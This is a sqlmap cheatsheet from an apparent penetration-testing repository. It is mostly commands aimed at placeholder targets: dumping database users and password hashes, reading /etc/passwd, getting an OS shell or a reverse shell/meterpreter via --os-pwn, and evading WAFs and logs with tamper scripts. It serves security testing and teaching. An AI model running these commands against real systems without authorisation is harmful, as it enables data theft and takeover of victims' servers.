daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

overview.md (15136B)


      1 ---
      2 title: "SQLMap - Cheatsheet"
      3 section: "Web Pentesting"
      4 sectionSlug: "pentesting-web"
      5 sourcePath: "src/pentesting-web/sql-injection/sqlmap/README.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/sql-injection/sqlmap/README.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: true
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # SQLMap - Cheatsheet
     14 
     15 This cheatsheet is the extended sqlmap option reference. For a shorter task-oriented starting point, see the [compact SQLMap guide](/hacktricks/pentesting-web/sql-injection/sqlmap).
     16 
     17 ## Basic arguments for SQLmap
     18 
     19 ### Generic
     20 
     21 ```bash
     22 -u "<URL>"
     23 -p "<PARAM TO TEST>"
     24 --user-agent=SQLMAP
     25 --random-agent
     26 --threads=10
     27 --risk=3 #MAX
     28 --level=5 #MAX
     29 --dbms="<KNOWN DB TECH>"
     30 --os="<OS>"
     31 --technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
     32 --batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
     33 --auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
     34 --auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
     35 --proxy=http://127.0.0.1:8080
     36 --union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
     37 ```
     38 
     39 ### Technique flags (`--technique`)
     40 
     41 The `--technique` option lets you restrict or reorder the SQL injection techniques sqlmap will test.  
     42 Each letter corresponds to a different class of payloads:
     43 
     44 | Letter | Technique | Description |
     45 | ------ | --------- | ----------- |
     46 | B | Boolean-based blind | Uses true/false conditions in the page response to infer results |
     47 | E | Error-based | Leverages verbose DBMS error messages to extract data |
     48 | U | UNION query | Injects `UNION SELECT` statements to fetch data via the same channel |
     49 | S | Stacked queries | Appends extra statements separated by a SQL delimiter (`;`) |
     50 | T | Time-based blind | Relies on `SLEEP/WAITFOR` delays to detect injectable conditions |
     51 | Q | Inline / out-of-band | Utilises functions such as `LOAD_FILE()` or DNS exfiltration to extract data |
     52 
     53 The default order that sqlmap will follow is `BEUSTQ` (all techniques).  
     54 You can change both the order and the subset. For instance, the following command will **only** attempt UNION query and Time-based blind techniques, trying UNION first:<sup>[[1]](#references)</sup>
     55 
     56 ```bash
     57 sqlmap -u "http://target.tld/page.php?id=1" --technique="UT" --batch
     58 ```
     59 
     60 ### Retrieve Information
     61 
     62 #### Internal
     63 
     64 ```bash
     65 --current-user #Get current user
     66 --is-dba #Check if current user is Admin
     67 --hostname #Get hostname
     68 --users #Get usernames od DB
     69 --passwords #Get passwords of users in DB
     70 --privileges #Get privileges
     71 ```
     72 
     73 #### DB data
     74 
     75 ```bash
     76 --all # Enumerate all available information
     77 --dump # Dump rows from selected DBMS tables
     78 --dbs # Enumerate database names
     79 --tables # Enumerate tables in -D <DB NAME>
     80 --columns # Enumerate columns in -D <DB NAME> -T <TABLE NAME>
     81 -D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> # Dump one selected column
     82 ```
     83 
     84 Using [SQLMapping](https://taurusomar.github.io/sqlmapping/) it is a practical tool that generates commands and provides a complete overview, both basic and advanced, for SQLMap. It includes ToolTips that explain each aspect of the tool, detailing every option so that you can improve and understand how to use it efficiently and effectively
     85 
     86 ## Injection place
     87 
     88 ### From Burp/ZAP capture
     89 
     90 Capture the request and create a req.txt file
     91 
     92 ```bash
     93 sqlmap -r req.txt --current-user
     94 ```
     95 
     96 ### GET Request Injection
     97 
     98 ```bash
     99 sqlmap -u "http://example.com/?id=1" -p id
    100 sqlmap -u "http://example.com/?id=*" -p id
    101 ```
    102 
    103 ### POST Request Injection
    104 
    105 ```bash
    106 sqlmap -u "http://example.com" --data "username=*&password=*"
    107 ```
    108 
    109 ### Injections in Headers and other HTTP Methods
    110 
    111 ```bash
    112 #Inside cookie
    113 sqlmap  -u "http://example.com" --cookie "mycookies=*"
    114 
    115 #Inside some header
    116 sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
    117 sqlmap -u "http://example.com" --headers="referer:*"
    118 
    119 #PUT Method
    120 sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
    121 
    122 #The injection is located at the '*'
    123 ```
    124 
    125 ### Indicate string when injection is successful
    126 
    127 ```bash
    128 --string="string_showed_when_TRUE"
    129 ```
    130 
    131 ### Add detection technique
    132 
    133 If you found a SQLi but sqlmap didn't detect it, you can force the detection technique with args like `--prefix` or `--suffix`, or if more complex, adding it to the paylaods used by sqlmap in `/usr/share/sqlmap/data/xml/payloads/time_blind.xml` for example for time blind based.
    134 
    135 
    136 ### Eval
    137 
    138 **Sqlmap** allows the use of `-e` or `--eval` to process each payload before sending it with some python oneliner. This makes very easy and fast to process in custom ways the payload before sending it. In the following example the **flask cookie session** **is signed by flask with the known secret before sending it**:
    139 
    140 ```bash
    141 sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
    142 ```
    143 
    144 ### Shell
    145 
    146 ```bash
    147 #Exec command
    148 python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
    149 
    150 #Simple Shell
    151 python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
    152 
    153 #Dropping a reverse-shell / meterpreter
    154 python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
    155 ```
    156 
    157 ### Read File
    158 
    159 ```bash
    160 --file-read=/etc/passwd
    161 ```
    162 
    163 ### Crawl a website with SQLmap and auto-exploit
    164 
    165 ```bash
    166 sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
    167 
    168 --batch = answer prompts with sqlmap's defaults
    169 --crawl = recursively follow links to the requested depth
    170 --forms = parse forms and test their input fields
    171 ```
    172 
    173 ### Second Order Injection
    174 
    175 ```bash
    176 # Revisit a separate endpoint after storing the first-order payload
    177 python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
    178 # Joomla administration example
    179 sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
    180 ```
    181 
    182 [**Read this post** ](/hacktricks/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap)**about how to perform simple and complex second order injections with sqlmap.**
    183 
    184 ## Customizing Injection
    185 
    186 ### Set a suffix
    187 
    188 ```bash
    189 python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
    190 ```
    191 
    192 ### Prefix
    193 
    194 ```bash
    195 python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "
    196 ```
    197 
    198 ### Help finding boolean injection
    199 
    200 ```bash
    201 # Mark a string that is absent from true responses to calibrate boolean-blind detection
    202 sqlmap -r r.txt -p id --not-string ridiculous --batch
    203 ```
    204 
    205 ### Tamper
    206 
    207 Remember that **you can create your own tamper in python** and it's very simple. You can find a tamper example in the [Second Order Injection page here](/hacktricks/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap).
    208 
    209 ```bash
    210 --tamper=name_of_the_tamper
    211 #In kali you can see all the tampers in /usr/share/sqlmap/tamper
    212 ```
    213 
    214 | Tamper                       | Description                                                                                                                        |
    215 | ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
    216 | apostrophemask.py            | Replaces apostrophe character with its UTF-8 full width counterpart                                                                |
    217 | apostrophenullencode.py      | Replaces apostrophe character with its illegal double unicode counterpart                                                          |
    218 | appendnullbyte.py            | Appends encoded NULL byte character at the end of payload                                                                          |
    219 | base64encode.py              | Base64 all characters in a given payload                                                                                           |
    220 | between.py                   | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'                                                                    |
    221 | bluecoat.py                  | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
    222 | chardoubleencode.py          | Double url-encodes all characters in a given payload (not processing already encoded)                                              |
    223 | commalesslimit.py            | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'                                                                       |
    224 | commalessmid.py              | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'                                                                  |
    225 | concat2concatws.py           | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'                                                  |
    226 | charencode.py                | Url-encodes all characters in a given payload (not processing already encoded)                                                     |
    227 | charunicodeencode.py         | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022"                           |
    228 | charunicodeescape.py         | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022"                           |
    229 | equaltolike.py               | Replaces all occurrences of the equality operator ('=') with `LIKE`                                                                |
    230 | escapequotes.py              | Slash escape quotes (' and ")                                                                                                      |
    231 | greatest.py                  | Replaces greater than operator ('>') with 'GREATEST' counterpart                                                                   |
    232 | halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword                                                                                   |
    233 | ifnull2ifisnull.py           | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'                                                                  |
    234 | modsecurityversioned.py      | Embraces complete query with versioned comment                                                                                     |
    235 | modsecurityzeroversioned.py  | Embraces complete query with zero-versioned comment                                                                                |
    236 | multiplespaces.py            | Adds multiple spaces around SQL keywords                                                                                           |
    237 | nonrecursivereplacement.py   | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters               |
    238 | percentage.py                | Adds a percentage sign ('%') in front of each character                                                                            |
    239 | overlongutf8.py              | Converts all characters in a given payload (not processing already encoded)                                                        |
    240 | randomcase.py                | Replaces each keyword character with random case value                                                                             |
    241 | randomcomments.py            | Add random comments to SQL keywords                                                                                                |
    242 | securesphere.py              | Appends special crafted string                                                                                                     |
    243 | sp_password.py               | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs                                           |
    244 | space2comment.py             | Replaces space character (' ') with comments                                                                                       |
    245 | space2dash.py                | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')                        |
    246 | space2hash.py                | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')                      |
    247 | space2morehash.py            | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')                      |
    248 | space2mssqlblank.py          | Replaces space character (' ') with a random blank character from a valid set of alternate characters                              |
    249 | space2mssqlhash.py           | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')                                          |
    250 | space2mysqlblank.py          | Replaces space character (' ') with a random blank character from a valid set of alternate characters                              |
    251 | space2mysqldash.py           | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')                                            |
    252 | space2plus.py                | Replaces space character (' ') with plus ('+')                                                                                     |
    253 | space2randomblank.py         | Replaces space character (' ') with a random blank character from a valid set of alternate characters                              |
    254 | symboliclogical.py           | Replaces AND and OR logical operators with their symbolic counterparts (&& and                                                     |
    255 | unionalltounion.py           | Replaces UNION ALL SELECT with UNION SELECT                                                                                        |
    256 | unmagicquotes.py             | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)             |
    257 | uppercase.py                 | Replaces each keyword character with upper case value 'INSERT'                                                                     |
    258 | varnish.py                   | Append a HTTP header 'X-originating-IP'                                                                                            |
    259 | versionedkeywords.py         | Encloses each non-function keyword with versioned MySQL comment                                                                    |
    260 | versionedmorekeywords.py     | Encloses each keyword with versioned MySQL comment                                                                                 |
    261 | xforwardedfor.py             | Append a fake HTTP header 'X-Forwarded-For'                                                                                        |
    262 
    263 
    264 ## References
    265 
    266 - [1] [SQLMap: Testing SQL Database Vulnerabilities](https://blog.bughunt.com.br/sqlmap-vulnerabilidades-banco-de-dados/)